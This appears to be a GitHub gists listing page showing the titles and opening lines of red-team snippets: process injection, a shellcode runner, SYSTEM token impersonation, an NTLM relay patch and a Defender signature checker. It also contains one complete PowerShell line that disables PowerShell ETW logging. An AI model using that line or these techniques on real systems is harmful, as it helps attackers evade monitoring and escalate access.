Skip to content

Instantly share code, notes, and snippets.

View chryzsh's full-sized avatar

crusher chryzsh

528 followers · 7 following
View GitHub Profile
@jfmaes
jfmaes / DInjectQueuerAPC.cs
Created November 13, 2020 19:00
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace DinjectorWithQUserAPC
{
public class Program
@daddycocoaman
daddycocoaman / pydefendercheck.py
Last active October 27, 2025 17:43
PyDefenderCheck
##################################################
## PyDefenderCheck - Python implementation of DefenderCheck
##################################################
## Author: daddycocoaman
## Based on: https://github.com/matterpreter/DefenderCheck
##################################################
import argparse
import enum
@sploutchy
sploutchy / rpcrelayclientserver.patch
Created September 9, 2020 09:56
RPC Relay Client and Server Patch
From 53256e4b29331df20a5977b54c1741b2adc30394 Mon Sep 17 00:00:00 2001
From: root <[email protected]>
Date: Wed, 9 Sep 2020 11:54:00 +0200
Subject: [PATCH] RPC Relay client and server
---
examples/ntlmrelayx.py | 12 +-
impacket/dcerpc/v5/dcomrt.py | 30 +-
impacket/dcerpc/v5/rpcrt.py | 624 ++++++++++++++++--
.../examples/ntlmrelayx/attacks/rpcattack.py | 95 +++
@S3cur3Th1sSh1t
S3cur3Th1sSh1t / DisablePSEtw.ps1
Created August 11, 2020 07:53
[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
@Flangvik
Flangvik / CreateRemoteThreadDInvoke.cs
Created July 19, 2020 15:54
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace InjectionTest
{
public class DELEGATES
{
@gquere
gquere / artifactory_list_users.py
Last active April 3, 2025 14:25
#!/usr/bin/env python3
import requests
import json
import urllib3
import sys
# SUPPRESS WARNINGS ############################################################
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
@LukeMathWalker
LukeMathWalker / audit.yml
Last active October 14, 2025 13:21
GitHub Actions - Rust setup
name: Security audit
on:
schedule:
- cron: '0 0 * * *'
push:
paths:
- '**/Cargo.toml'
- '**/Cargo.lock'
jobs:
security_audit:
@peewpw
peewpw / shellcode_x64.py
Created May 12, 2020 16:03
64 bit Python3 compatible shellcode runner
# 64 bit compatible shellcode launcher
#
# The versions of this I've attempted to use appear to only work in 32bit Python (at least for 3.7-8).
# Hence why this was neede to solve a problem.
#
# based on work from:
# http://www.debasish.in/2012/04/execute-shellcode-using-python.html
# https://www.christophertruncer.com/shellcode-manipulation-and-injection-in-python-3/
# https://stackoverflow.com/a/61258392
#
@rvrsh3ll
rvrsh3ll / gadget2jscriptQueueAPCInject.cs
Last active July 21, 2023 13:07
using System;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Net;
using System.IO.Compression;
public class Payload
{
@mvelazc0
mvelazc0 / GetSystem.cs
Last active February 17, 2025 17:39
Escalates to SYSTEM leveraging OpenProcess, OpenProcessToken and ImpersonateLoggedOnUser. https://attack.mitre.org/beta/techniques/T1134/. Needs to run as a High Integrity proc. Needs SeDebugPrivilege
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;
//Based on https://0x00-0x00.github.io/research/2018/10/17/Windows-API-and-Impersonation-Part1.html
namespace GetSystem
{
class Program
{